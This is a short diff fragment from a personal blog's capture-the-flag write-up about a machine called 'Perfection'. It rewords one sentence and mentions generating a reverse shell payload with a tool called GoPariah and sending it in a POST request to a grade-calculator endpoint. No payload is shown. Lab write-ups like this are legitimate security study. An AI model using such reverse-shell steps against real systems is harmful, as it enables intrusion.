julio-cfa/julio-cfa.github.io/blog/write-ups/machines-perfection.md

 49 : 16%</p>
 ```

-<p>And it worked.
+<p>And, as seen above, it worked.
 We can now geenrate a reverse shell payload with GoPariah and send it in the request</p>´

 ```bash
 POST /weighted-grade-calc HTTP/1.1